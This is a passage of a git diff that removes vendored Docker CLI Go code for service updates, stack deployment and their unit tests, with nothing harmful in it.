- if strings.Contains(port, ":") { - return "", fmt.Errorf("invalid port format: '%s', should be [/] (e.g., 80, 80/tcp, 53/udp)", port) - } - if _, err := nat.ParsePort(port); err != nil { - return "", err - } - return val, nil -} - -func updatePorts(flags *pflag.FlagSet, portConfig *[]swarm.PortConfig) error { - // The key of the map is `port/protocol`, e.g., `80/tcp` - portSet := map[string]swarm.PortConfig{} - - // Build the current list of portConfig - for _, entry := range *portConfig { - if _, ok := portSet[portConfigToString(&entry)]; !ok { - portSet[portConfigToString(&entry)] = entry - } - } - - newPorts := []swarm.PortConfig{} - - // Clean current ports - toRemove := flags.Lookup(flagPublishRemove).Value.(*opts.PortOpt).Value() -portLoop: - for _, port := range portSet { - for _, pConfig := range toRemove { - if equalProtocol(port.Protocol, pConfig.Protocol) && - port.TargetPort == pConfig.TargetPort && - equalPublishMode(port.PublishMode, pConfig.PublishMode) { - continue portLoop - } - } - - newPorts = append(newPorts, port) - } - - // Check to see if there are any conflict in flags. - if flags.Changed(flagPublishAdd) { - ports := flags.Lookup(flagPublishAdd).Value.(*opts.PortOpt).Value() - - for _, port := range ports { - if v, ok := portSet[portConfigToString(&port)]; ok { - if v != port { - fmt.Println("v", v) - return fmt.Errorf("conflicting port mapping between %v:%v/%s and %v:%v/%s", port.PublishedPort, port.TargetPort, port.Protocol, v.PublishedPort, v.TargetPort, v.Protocol) - } - continue - } - //portSet[portConfigToString(&port)] = port - newPorts = append(newPorts, port) - } - } - - // Sort the PortConfig to avoid unnecessary updates - sort.Sort(byPortConfig(newPorts)) - *portConfig = newPorts - return nil -} - -func equalProtocol(prot1, prot2 swarm.PortConfigProtocol) bool { - return prot1 == prot2 || - (prot1 == swarm.PortConfigProtocol("") && prot2 == swarm.PortConfigProtocolTCP) || - (prot2 == swarm.PortConfigProtocol("") && prot1 == swarm.PortConfigProtocolTCP) -} - -func equalPublishMode(mode1, mode2 swarm.PortConfigPublishMode) bool { - return mode1 == mode2 || - (mode1 == swarm.PortConfigPublishMode("") && mode2 == swarm.PortConfigPublishModeIngress) || - (mode2 == swarm.PortConfigPublishMode("") && mode1 == swarm.PortConfigPublishModeIngress) -} - -func equalPort(targetPort nat.Port, port swarm.PortConfig) bool { - return (string(port.Protocol) == targetPort.Proto() && - port.TargetPort == uint32(targetPort.Int())) -} - -func updateReplicas(flags *pflag.FlagSet, serviceMode *swarm.ServiceMode) error { - if !flags.Changed(flagReplicas) { - return nil - } - - if serviceMode == nil || serviceMode.Replicated == nil { - return fmt.Errorf("replicas can only be used with replicated mode") - } - serviceMode.Replicated.Replicas = flags.Lookup(flagReplicas).Value.(*Uint64Opt).Value() - return nil -} - -func updateHosts(flags *pflag.FlagSet, hosts *[]string) error { - // Combine existing Hosts (in swarmkit format) with the host to add (convert to swarmkit format) - if flags.Changed(flagHostAdd) { - values := convertExtraHostsToSwarmHosts(flags.Lookup(flagHostAdd).Value.(*opts.ListOpts).GetAll()) - *hosts = append(*hosts, values...) - } - // Remove duplicate - *hosts = removeDuplicates(*hosts) - - keysToRemove := make(map[string]struct{}) - if flags.Changed(flagHostRemove) { - var empty struct{} - extraHostsToRemove := flags.Lookup(flagHostRemove).Value.(*opts.ListOpts).GetAll() - for _, entry := range extraHostsToRemove { - key := strings.SplitN(entry, ":", 2)[0] - keysToRemove[key] = empty - } - } - - newHosts := []string{} - for _, entry := range *hosts { - // Since this is in swarmkit format, we need to find the key, which is canonical_hostname of: - // IP_address canonical_hostname [aliases...] - parts := strings.Fields(entry) - if len(parts) > 1 { - key := parts[1] - if _, exists := keysToRemove[key]; !exists { - newHosts = append(newHosts, entry) - } - } else { - newHosts = append(newHosts, entry) - } - } - - // Sort so that result is predictable. - sort.Strings(newHosts) - - *hosts = newHosts - return nil -} - -// updateLogDriver updates the log driver only if the log driver flag is set. -// All options will be replaced with those provided on the command line. -func updateLogDriver(flags *pflag.FlagSet, taskTemplate *swarm.TaskSpec) error { - if !flags.Changed(flagLogDriver) { - return nil - } - - name, err := flags.GetString(flagLogDriver) - if err != nil { - return err - } - - if name == "" { - return nil - } - - taskTemplate.LogDriver = &swarm.Driver{ - Name: name, - Options: runconfigopts.ConvertKVStringsToMap(flags.Lookup(flagLogOpt).Value.(*opts.ListOpts).GetAll()), - } - - return nil -} - -func updateHealthcheck(flags *pflag.FlagSet, containerSpec *swarm.ContainerSpec) error { - if !anyChanged(flags, flagNoHealthcheck, flagHealthCmd, flagHealthInterval, flagHealthRetries, flagHealthTimeout) { - return nil - } - if containerSpec.Healthcheck == nil { - containerSpec.Healthcheck = &container.HealthConfig{} - } - noHealthcheck, err := flags.GetBool(flagNoHealthcheck) - if err != nil { - return err - } - if noHealthcheck { - if !anyChanged(flags, flagHealthCmd, flagHealthInterval, flagHealthRetries, flagHealthTimeout) { - containerSpec.Healthcheck = &container.HealthConfig{ - Test: []string{"NONE"}, - } - return nil - } - return fmt.Errorf("--%s conflicts with --health-* options", flagNoHealthcheck) - } - if len(containerSpec.Healthcheck.Test) > 0 && containerSpec.Healthcheck.Test[0] == "NONE" { - containerSpec.Healthcheck.Test = nil - } - if flags.Changed(flagHealthInterval) { - val := *flags.Lookup(flagHealthInterval).Value.(*PositiveDurationOpt).Value() - containerSpec.Healthcheck.Interval = val - } - if flags.Changed(flagHealthTimeout) { - val := *flags.Lookup(flagHealthTimeout).Value.(*PositiveDurationOpt).Value() - containerSpec.Healthcheck.Timeout = val - } - if flags.Changed(flagHealthRetries) { - containerSpec.Healthcheck.Retries, _ = flags.GetInt(flagHealthRetries) - } - if flags.Changed(flagHealthCmd) { - cmd, _ := flags.GetString(flagHealthCmd) - if cmd != "" { - containerSpec.Healthcheck.Test = []string{"CMD-SHELL", cmd} - } else { - containerSpec.Healthcheck.Test = nil - } - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/update_test.go b/vendor/github.com/docker/docker/cli/command/service/update_test.go deleted file mode 100644 index 08fe248769..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/update_test.go +++ /dev/null @@ -1,384 +0,0 @@ -package service - -import ( - "reflect" - "sort" - "testing" - "time" - - "github.com/docker/docker/api/types/container" - mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestUpdateServiceArgs(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("args", "the \"new args\"") - - spec := &swarm.ServiceSpec{} - cspec := &spec.TaskTemplate.ContainerSpec - cspec.Args = []string{"old", "args"} - - updateService(flags, spec) - assert.EqualStringSlice(t, cspec.Args, []string{"the", "new args"}) -} - -func TestUpdateLabels(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("label-add", "toadd=newlabel") - flags.Set("label-rm", "toremove") - - labels := map[string]string{ - "toremove": "thelabeltoremove", - "tokeep": "value", - } - - updateLabels(flags, &labels) - assert.Equal(t, len(labels), 2) - assert.Equal(t, labels["tokeep"], "value") - assert.Equal(t, labels["toadd"], "newlabel") -} - -func TestUpdateLabelsRemoveALabelThatDoesNotExist(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("label-rm", "dne") - - labels := map[string]string{"foo": "theoldlabel"} - updateLabels(flags, &labels) - assert.Equal(t, len(labels), 1) -} - -func TestUpdatePlacement(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("constraint-add", "node=toadd") - flags.Set("constraint-rm", "node!=toremove") - - placement := &swarm.Placement{ - Constraints: []string{"node!=toremove", "container=tokeep"}, - } - - updatePlacement(flags, placement) - assert.Equal(t, len(placement.Constraints), 2) - assert.Equal(t, placement.Constraints[0], "container=tokeep") - assert.Equal(t, placement.Constraints[1], "node=toadd") -} - -func TestUpdateEnvironment(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("env-add", "toadd=newenv") - flags.Set("env-rm", "toremove") - - envs := []string{"toremove=theenvtoremove", "tokeep=value"} - - updateEnvironment(flags, &envs) - assert.Equal(t, len(envs), 2) - // Order has been removed in updateEnvironment (map) - sort.Strings(envs) - assert.Equal(t, envs[0], "toadd=newenv") - assert.Equal(t, envs[1], "tokeep=value") -} - -func TestUpdateEnvironmentWithDuplicateValues(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("env-add", "foo=newenv") - flags.Set("env-add", "foo=dupe") - flags.Set("env-rm", "foo") - - envs := []string{"foo=value"} - - updateEnvironment(flags, &envs) - assert.Equal(t, len(envs), 0) -} - -func TestUpdateEnvironmentWithDuplicateKeys(t *testing.T) { - // Test case for #25404 - flags := newUpdateCommand(nil).Flags() - flags.Set("env-add", "A=b") - - envs := []string{"A=c"} - - updateEnvironment(flags, &envs) - assert.Equal(t, len(envs), 1) - assert.Equal(t, envs[0], "A=b") -} - -func TestUpdateGroups(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("group-add", "wheel") - flags.Set("group-add", "docker") - flags.Set("group-rm", "root") - flags.Set("group-add", "foo") - flags.Set("group-rm", "docker") - - groups := []string{"bar", "root"} - - updateGroups(flags, &groups) - assert.Equal(t, len(groups), 3) - assert.Equal(t, groups[0], "bar") - assert.Equal(t, groups[1], "foo") - assert.Equal(t, groups[2], "wheel") -} - -func TestUpdateDNSConfig(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - - // IPv4, with duplicates - flags.Set("dns-add", "1.1.1.1") - flags.Set("dns-add", "1.1.1.1") - flags.Set("dns-add", "2.2.2.2") - flags.Set("dns-rm", "3.3.3.3") - flags.Set("dns-rm", "2.2.2.2") - // IPv6 - flags.Set("dns-add", "2001:db8:abc8::1") - // Invalid dns record - assert.Error(t, flags.Set("dns-add", "x.y.z.w"), "x.y.z.w is not an ip address") - - // domains with duplicates - flags.Set("dns-search-add", "example.com") - flags.Set("dns-search-add", "example.com") - flags.Set("dns-search-add", "example.org") - flags.Set("dns-search-rm", "example.org") - // Invalid dns search domain - assert.Error(t, flags.Set("dns-search-add", "example$com"), "example$com is not a valid domain") - - flags.Set("dns-option-add", "ndots:9") - flags.Set("dns-option-rm", "timeout:3") - - config := &swarm.DNSConfig{ - Nameservers: []string{"3.3.3.3", "5.5.5.5"}, - Search: []string{"localdomain"}, - Options: []string{"timeout:3"}, - } - - updateDNSConfig(flags, &config) - - assert.Equal(t, len(config.Nameservers), 3) - assert.Equal(t, config.Nameservers[0], "1.1.1.1") - assert.Equal(t, config.Nameservers[1], "2001:db8:abc8::1") - assert.Equal(t, config.Nameservers[2], "5.5.5.5") - - assert.Equal(t, len(config.Search), 2) - assert.Equal(t, config.Search[0], "example.com") - assert.Equal(t, config.Search[1], "localdomain") - - assert.Equal(t, len(config.Options), 1) - assert.Equal(t, config.Options[0], "ndots:9") -} - -func TestUpdateMounts(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("mount-add", "type=volume,source=vol2,target=/toadd") - flags.Set("mount-rm", "/toremove") - - mounts := []mounttypes.Mount{ - {Target: "/toremove", Source: "vol1", Type: mounttypes.TypeBind}, - {Target: "/tokeep", Source: "vol3", Type: mounttypes.TypeBind}, - } - - updateMounts(flags, &mounts) - assert.Equal(t, len(mounts), 2) - assert.Equal(t, mounts[0].Target, "/toadd") - assert.Equal(t, mounts[1].Target, "/tokeep") - -} - -func TestUpdateMountsWithDuplicateMounts(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("mount-add", "type=volume,source=vol4,target=/toadd") - - mounts := []mounttypes.Mount{ - {Target: "/tokeep1", Source: "vol1", Type: mounttypes.TypeBind}, - {Target: "/toadd", Source: "vol2", Type: mounttypes.TypeBind}, - {Target: "/tokeep2", Source: "vol3", Type: mounttypes.TypeBind}, - } - - updateMounts(flags, &mounts) - assert.Equal(t, len(mounts), 3) - assert.Equal(t, mounts[0].Target, "/tokeep1") - assert.Equal(t, mounts[1].Target, "/tokeep2") - assert.Equal(t, mounts[2].Target, "/toadd") -} - -func TestUpdatePorts(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("publish-add", "1000:1000") - flags.Set("publish-rm", "333/udp") - - portConfigs := []swarm.PortConfig{ - {TargetPort: 333, Protocol: swarm.PortConfigProtocolUDP}, - {TargetPort: 555}, - } - - err := updatePorts(flags, &portConfigs) - assert.Equal(t, err, nil) - assert.Equal(t, len(portConfigs), 2) - // Do a sort to have the order (might have changed by map) - targetPorts := []int{int(portConfigs[0].TargetPort), int(portConfigs[1].TargetPort)} - sort.Ints(targetPorts) - assert.Equal(t, targetPorts[0], 555) - assert.Equal(t, targetPorts[1], 1000) -} - -func TestUpdatePortsDuplicate(t *testing.T) { - // Test case for #25375 - flags := newUpdateCommand(nil).Flags() - flags.Set("publish-add", "80:80") - - portConfigs := []swarm.PortConfig{ - { - TargetPort: 80, - PublishedPort: 80, - Protocol: swarm.PortConfigProtocolTCP, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - } - - err := updatePorts(flags, &portConfigs) - assert.Equal(t, err, nil) - assert.Equal(t, len(portConfigs), 1) - assert.Equal(t, portConfigs[0].TargetPort, uint32(80)) -} - -func TestUpdateHealthcheckTable(t *testing.T) { - type test struct { - flags [][2]string - initial *container.HealthConfig - expected *container.HealthConfig - err string - } - testCases := []test{ - { - flags: [][2]string{{"no-healthcheck", "true"}}, - initial: &container.HealthConfig{Test: []string{"CMD-SHELL", "cmd1"}, Retries: 10}, - expected: &container.HealthConfig{Test: []string{"NONE"}}, - }, - { - flags: [][2]string{{"health-cmd", "cmd1"}}, - initial: &container.HealthConfig{Test: []string{"NONE"}}, - expected: &container.HealthConfig{Test: []string{"CMD-SHELL", "cmd1"}}, - }, - { - flags: [][2]string{{"health-retries", "10"}}, - initial: &container.HealthConfig{Test: []string{"NONE"}}, - expected: &container.HealthConfig{Retries: 10}, - }, - { - flags: [][2]string{{"health-retries", "10"}}, - initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}}, - expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10}, - }, - { - flags: [][2]string{{"health-interval", "1m"}}, - initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}}, - expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Interval: time.Minute}, - }, - { - flags: [][2]string{{"health-cmd", ""}}, - initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10}, - expected: &container.HealthConfig{Retries: 10}, - }, - { - flags: [][2]string{{"health-retries", "0"}}, - initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10}, - expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}}, - }, - { - flags: [][2]string{{"health-cmd", "cmd1"}, {"no-healthcheck", "true"}}, - err: "--no-healthcheck conflicts with --health-* options", - }, - { - flags: [][2]string{{"health-interval", "10m"}, {"no-healthcheck", "true"}}, - err: "--no-healthcheck conflicts with --health-* options", - }, - { - flags: [][2]string{{"health-timeout", "1m"}, {"no-healthcheck", "true"}}, - err: "--no-healthcheck conflicts with --health-* options", - }, - } - for i, c := range testCases { - flags := newUpdateCommand(nil).Flags() - for _, flag := range c.flags { - flags.Set(flag[0], flag[1]) - } - cspec := &swarm.ContainerSpec{ - Healthcheck: c.initial, - } - err := updateHealthcheck(flags, cspec) - if c.err != "" { - assert.Error(t, err, c.err) - } else { - assert.NilError(t, err) - if !reflect.DeepEqual(cspec.Healthcheck, c.expected) { - t.Errorf("incorrect result for test %d, expected health config:\n\t%#v\ngot:\n\t%#v", i, c.expected, cspec.Healthcheck) - } - } - } -} - -func TestUpdateHosts(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("host-add", "example.net:2.2.2.2") - flags.Set("host-add", "ipv6.net:2001:db8:abc8::1") - // remove with ipv6 should work - flags.Set("host-rm", "example.net:2001:db8:abc8::1") - // just hostname should work as well - flags.Set("host-rm", "example.net") - // bad format error - assert.Error(t, flags.Set("host-add", "$example.com$"), "bad format for add-host:") - - hosts := []string{"1.2.3.4 example.com", "4.3.2.1 example.org", "2001:db8:abc8::1 example.net"} - - updateHosts(flags, &hosts) - assert.Equal(t, len(hosts), 3) - assert.Equal(t, hosts[0], "1.2.3.4 example.com") - assert.Equal(t, hosts[1], "2001:db8:abc8::1 ipv6.net") - assert.Equal(t, hosts[2], "4.3.2.1 example.org") -} - -func TestUpdatePortsRmWithProtocol(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("publish-add", "8081:81") - flags.Set("publish-add", "8082:82") - flags.Set("publish-rm", "80") - flags.Set("publish-rm", "81/tcp") - flags.Set("publish-rm", "82/udp") - - portConfigs := []swarm.PortConfig{ - { - TargetPort: 80, - PublishedPort: 8080, - Protocol: swarm.PortConfigProtocolTCP, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - } - - err := updatePorts(flags, &portConfigs) - assert.Equal(t, err, nil) - assert.Equal(t, len(portConfigs), 2) - assert.Equal(t, portConfigs[0].TargetPort, uint32(81)) - assert.Equal(t, portConfigs[1].TargetPort, uint32(82)) -} - -// FIXME(vdemeester) port to opts.PortOpt -func TestValidatePort(t *testing.T) { - validPorts := []string{"80/tcp", "80", "80/udp"} - invalidPorts := map[string]string{ - "9999999": "out of range", - "80:80/tcp": "invalid port format", - "53:53/udp": "invalid port format", - "80:80": "invalid port format", - "80/xyz": "invalid protocol", - "tcp": "invalid syntax", - "udp": "invalid syntax", - "": "invalid protocol", - } - for _, port := range validPorts { - _, err := validatePublishRemove(port) - assert.Equal(t, err, nil) - } - for port, e := range invalidPorts { - _, err := validatePublishRemove(port) - assert.Error(t, err, e) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/cmd.go b/vendor/github.com/docker/docker/cli/command/stack/cmd.go deleted file mode 100644 index 860bfedd1a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/cmd.go +++ /dev/null @@ -1,35 +0,0 @@ -package stack - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -// NewStackCommand returns a cobra command for `stack` subcommands -func NewStackCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "stack", - Short: "Manage Docker stacks", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - Tags: map[string]string{"version": "1.25"}, - } - cmd.AddCommand( - newDeployCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - newServicesCommand(dockerCli), - newPsCommand(dockerCli), - ) - return cmd -} - -// NewTopLevelDeployCommand returns a command for `docker deploy` -func NewTopLevelDeployCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := newDeployCommand(dockerCli) - // Remove the aliases at the top level - cmd.Aliases = []string{} - cmd.Tags = map[string]string{"experimental": "", "version": "1.25"} - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/common.go b/vendor/github.com/docker/docker/cli/command/stack/common.go deleted file mode 100644 index 72719f94fc..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/common.go +++ /dev/null @@ -1,60 +0,0 @@ -package stack - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli/compose/convert" - "github.com/docker/docker/client" - "github.com/docker/docker/opts" -) - -func getStackFilter(namespace string) filters.Args { - filter := filters.NewArgs() - filter.Add("label", convert.LabelNamespace+"="+namespace) - return filter -} - -func getStackFilterFromOpt(namespace string, opt opts.FilterOpt) filters.Args { - filter := opt.Value() - filter.Add("label", convert.LabelNamespace+"="+namespace) - return filter -} - -func getAllStacksFilter() filters.Args { - filter := filters.NewArgs() - filter.Add("label", convert.LabelNamespace) - return filter -} - -func getServices( - ctx context.Context, - apiclient client.APIClient, - namespace string, -) ([]swarm.Service, error) { - return apiclient.ServiceList( - ctx, - types.ServiceListOptions{Filters: getStackFilter(namespace)}) -} - -func getStackNetworks( - ctx context.Context, - apiclient client.APIClient, - namespace string, -) ([]types.NetworkResource, error) { - return apiclient.NetworkList( - ctx, - types.NetworkListOptions{Filters: getStackFilter(namespace)}) -} - -func getStackSecrets( - ctx context.Context, - apiclient client.APIClient, - namespace string, -) ([]swarm.Secret, error) { - return apiclient.SecretList( - ctx, - types.SecretListOptions{Filters: getStackFilter(namespace)}) -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/deploy.go b/vendor/github.com/docker/docker/cli/command/stack/deploy.go deleted file mode 100644 index 980876a6a1..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/deploy.go +++ /dev/null @@ -1,357 +0,0 @@ -package stack - -import ( - "fmt" - "io/ioutil" - "os" - "sort" - "strings" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - secretcli "github.com/docker/docker/cli/command/secret" - "github.com/docker/docker/cli/compose/convert" - "github.com/docker/docker/cli/compose/loader" - composetypes "github.com/docker/docker/cli/compose/types" - dockerclient "github.com/docker/docker/client" - "github.com/pkg/errors" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -const ( - defaultNetworkDriver = "overlay" -) - -type deployOptions struct { - bundlefile string - composefile string - namespace string - sendRegistryAuth bool -} - -func newDeployCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts deployOptions - - cmd := &cobra.Command{ - Use: "deploy [OPTIONS] STACK", - Aliases: []string{"up"}, - Short: "Deploy a new stack or update an existing stack", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.namespace = args[0] - return runDeploy(dockerCli, opts) - }, - } - - flags := cmd.Flags() - addBundlefileFlag(&opts.bundlefile, flags) - addComposefileFlag(&opts.composefile, flags) - addRegistryAuthFlag(&opts.sendRegistryAuth, flags) - return cmd -} - -func runDeploy(dockerCli *command.DockerCli, opts deployOptions) error { - ctx := context.Background() - - switch { - case opts.bundlefile == "" && opts.composefile == "": - return fmt.Errorf("Please specify either a bundle file (with --bundle-file) or a Compose file (with --compose-file).") - case opts.bundlefile != "" && opts.composefile != "": - return fmt.Errorf("You cannot specify both a bundle file and a Compose file.") - case opts.bundlefile != "": - return deployBundle(ctx, dockerCli, opts) - default: - return deployCompose(ctx, dockerCli, opts) - } -} - -// checkDaemonIsSwarmManager does an Info API call to verify that the daemon is -// a swarm manager. This is necessary because we must create networks before we -// create services, but the API call for creating a network does not return a -// proper status code when it can't create a network in the "global" scope. -func checkDaemonIsSwarmManager(ctx context.Context, dockerCli *command.DockerCli) error { - info, err := dockerCli.Client().Info(ctx) - if err != nil { - return err - } - if !info.Swarm.ControlAvailable { - return errors.New("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.") - } - return nil -} - -func deployCompose(ctx context.Context, dockerCli *command.DockerCli, opts deployOptions) error { - configDetails, err := getConfigDetails(opts) - if err != nil { - return err - } - - config, err := loader.Load(configDetails) - if err != nil { - if fpe, ok := err.(*loader.ForbiddenPropertiesError); ok { - return fmt.Errorf("Compose file contains unsupported options:\n\n%s\n", - propertyWarnings(fpe.Properties)) - } - - return err - } - - unsupportedProperties := loader.GetUnsupportedProperties(configDetails) - if len(unsupportedProperties) > 0 { - fmt.Fprintf(dockerCli.Err(), "Ignoring unsupported options: %s\n\n", - strings.Join(unsupportedProperties, ", ")) - } - - deprecatedProperties := loader.GetDeprecatedProperties(configDetails) - if len(deprecatedProperties) > 0 { - fmt.Fprintf(dockerCli.Err(), "Ignoring deprecated options:\n\n%s\n\n", - propertyWarnings(deprecatedProperties)) - } - - if err := checkDaemonIsSwarmManager(ctx, dockerCli); err != nil { - return err - } - - namespace := convert.NewNamespace(opts.namespace) - - serviceNetworks := getServicesDeclaredNetworks(config.Services) - networks, externalNetworks := convert.Networks(namespace, config.Networks, serviceNetworks) - if err := validateExternalNetworks(ctx, dockerCli, externalNetworks); err != nil { - return err - } - if err := createNetworks(ctx, dockerCli, namespace, networks); err != nil { - return err - } - - secrets, err := convert.Secrets(namespace, config.Secrets) - if err != nil { - return err - } - if err := createSecrets(ctx, dockerCli, namespace, secrets); err != nil { - return err - } - - services, err := convert.Services(namespace, config, dockerCli.Client()) - if err != nil { - return err - } - return deployServices(ctx, dockerCli, services, namespace, opts.sendRegistryAuth) -} -func getServicesDeclaredNetworks(serviceConfigs []composetypes.ServiceConfig) map[string]struct{} { - serviceNetworks := map[string]struct{}{} - for _, serviceConfig := range serviceConfigs { - if len(serviceConfig.Networks) == 0 { - serviceNetworks["default"] = struct{}{} - continue - } - for network := range serviceConfig.Networks { - serviceNetworks[network] = struct{}{} - } - } - return serviceNetworks -} - -func propertyWarnings(properties map[string]string) string { - var msgs []string - for name, description := range properties { - msgs = append(msgs, fmt.Sprintf("%s: %s", name, description)) - } - sort.Strings(msgs) - return strings.Join(msgs, "\n\n") -} - -func getConfigDetails(opts deployOptions) (composetypes.ConfigDetails, error) { - var details composetypes.ConfigDetails - var err error - - details.WorkingDir, err = os.Getwd() - if err != nil { - return details, err - } - - configFile, err := getConfigFile(opts.composefile) - if err != nil { - return details, err - } - // TODO: support multiple files - details.ConfigFiles = []composetypes.ConfigFile{*configFile} - return details, nil -} - -func getConfigFile(filename string) (*composetypes.ConfigFile, error) { - bytes, err := ioutil.ReadFile(filename) - if err != nil { - return nil, err - } - config, err := loader.ParseYAML(bytes) - if err != nil { - return nil, err - } - return &composetypes.ConfigFile{ - Filename: filename, - Config: config, - }, nil -} - -func validateExternalNetworks( - ctx context.Context, - dockerCli *command.DockerCli, - externalNetworks []string) error { - client := dockerCli.Client() - - for _, networkName := range externalNetworks { - network, err := client.NetworkInspect(ctx, networkName) - if err != nil { - if dockerclient.IsErrNetworkNotFound(err) { - return fmt.Errorf("network %q is declared as external, but could not be found. You need to create the network before the stack is deployed (with overlay driver)", networkName) - } - return err - } - if network.Scope != "swarm" { - return fmt.Errorf("network %q is declared as external, but it is not in the right scope: %q instead of %q", networkName, network.Scope, "swarm") - } - } - - return nil -} - -func createSecrets( - ctx context.Context, - dockerCli *command.DockerCli, - namespace convert.Namespace, - secrets []swarm.SecretSpec, -) error { - client := dockerCli.Client() - - for _, secretSpec := range secrets { - // TODO: fix this after https://github.com/docker/docker/pull/29218 - secrets, err := secretcli.GetSecretsByNameOrIDPrefixes(ctx, client, []string{secretSpec.Name}) - switch { - case err != nil: - return err - case len(secrets) > 1: - return errors.Errorf("ambiguous secret name: %s", secretSpec.Name) - case len(secrets) == 0: - fmt.Fprintf(dockerCli.Out(), "Creating secret %s\n", secretSpec.Name) - _, err = client.SecretCreate(ctx, secretSpec) - default: - secret := secrets[0] - // Update secret to ensure that the local data hasn't changed - err = client.SecretUpdate(ctx, secret.ID, secret.Meta.Version, secretSpec) - } - if err != nil { - return err - } - } - return nil -} - -func createNetworks( - ctx context.Context, - dockerCli *command.DockerCli, - namespace convert.Namespace, - networks map[string]types.NetworkCreate, -) error { - client := dockerCli.Client() - - existingNetworks, err := getStackNetworks(ctx, client, namespace.Name()) - if err != nil { - return err - } - - existingNetworkMap := make(map[string]types.NetworkResource) - for _, network := range existingNetworks { - existingNetworkMap[network.Name] = network - } - - for internalName, createOpts := range networks { - name := namespace.Scope(internalName) - if _, exists := existingNetworkMap[name]; exists { - continue - } - - if createOpts.Driver == "" { - createOpts.Driver = defaultNetworkDriver - } - - fmt.Fprintf(dockerCli.Out(), "Creating network %s\n", name) - if _, err := client.NetworkCreate(ctx, name, createOpts); err != nil { - return err - } - } - - return nil -} - -func deployServices( - ctx context.Context, - dockerCli *command.DockerCli, - services map[string]swarm.ServiceSpec, - namespace convert.Namespace, - sendAuth bool, -) error { - apiClient := dockerCli.Client() - out := dockerCli.Out() - - existingServices, err := getServices(ctx, apiClient, namespace.Name()) - if err != nil { - return err - } - - existingServiceMap := make(map[string]swarm.Service) - for _, service := range existingServices { - existingServiceMap[service.Spec.Name] = service - } - - for internalName, serviceSpec := range services { - name := namespace.Scope(internalName) - - encodedAuth := "" - if sendAuth { - // Retrieve encoded auth token from the image reference - image := serviceSpec.TaskTemplate.ContainerSpec.Image - encodedAuth, err = command.RetrieveAuthTokenFromImage(ctx, dockerCli, image) - if err != nil { - return err - } - } - - if service, exists := existingServiceMap[name]; exists { - fmt.Fprintf(out, "Updating service %s (id: %s)\n", name, service.ID) - - updateOpts := types.ServiceUpdateOptions{} - if sendAuth { - updateOpts.EncodedRegistryAuth = encodedAuth - } - response, err := apiClient.ServiceUpdate( - ctx, - service.ID, - service.Version, - serviceSpec, - updateOpts, - ) - if err != nil { - return err - } - - for _, warning := range response.Warnings { - fmt.Fprintln(dockerCli.Err(), warning) - } - } else { - fmt.Fprintf(out, "Creating service %s\n", name) - - createOpts := types.ServiceCreateOptions{} - if sendAuth { - createOpts.EncodedRegistryAuth = encodedAuth - } - if _, err := apiClient.ServiceCreate(ctx, serviceSpec, createOpts); err != nil { - return err - } - } - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go b/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go deleted file mode 100644 index 5a178c4ab6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go +++ /dev/null @@ -1,83 +0,0 @@ -package stack - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/compose/convert" -) - -func deployBundle(ctx context.Context, dockerCli *command.DockerCli, opts deployOptions) error { - bundle, err := loadBundlefile(dockerCli.Err(), opts.namespace, opts.bundlefile) - if err != nil { - return err - } - - if err := checkDaemonIsSwarmManager(ctx, dockerCli); err != nil { - return err - } - - namespace := convert.NewNamespace(opts.namespace) - - networks := make(map[string]types.NetworkCreate) - for _, service := range 